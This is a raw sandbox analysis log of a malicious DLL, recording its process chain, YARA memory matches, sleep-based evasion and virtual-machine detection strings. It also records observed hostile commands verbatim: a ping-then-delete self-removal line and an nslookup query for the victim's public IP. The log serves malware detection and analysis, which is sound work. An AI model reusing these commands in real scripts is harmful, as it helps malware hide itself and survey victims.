                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A5.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04896DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_04896DB6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B065705F-4F3D-628A-59E4-F3B69D58D74A}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1348:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:588:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{AC454211-1B05-BEF7-05A0-7FD209D42326}
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6740
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{04E081A2-93EB-D67B-3D78-776AC12C9B3E}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: nhLAwAo49f.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.458226282.0000000000480000.00000002.00000001.01000000.00000003.sdmp, nhLAwAo49f.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdbine89 source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0489B2FF push esi; retf 2_2_0489B301
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0489820B push ecx; ret 2_2_0489821B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04897E20 push ecx; ret 2_2_04897E29
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00B732B0 push ecx; ret 2_2_00B732B9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00B62C1A push ecx; mov dword ptr [esp], 00000002h 2_2_00B62C1B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00B737E3 push ecx; ret 2_2_00B737F3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00B5A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00B5A513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline (listed 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline (listed 2 times)
Source: ci1gjuu1.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0xf773
Source: nhLAwAo49f.dll | Static PE information: real checksum: 0x872fe521 should be: 0xa9885
Source: f2vxj03f.dll.21.dr | Static PE information: real checksum: 0x0 should be: 0xf75c
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll

                      Hooking and other Techniques for Hiding and Protection

Source: Yara match | File source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
Source: Yara match | File source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6738
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2116
                      Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_00B5591B
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: mshta.exe, 00000011.00000002.618351253.0000026BC911C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\a
                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 0000001F.00000000.759539039.0000013857059000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
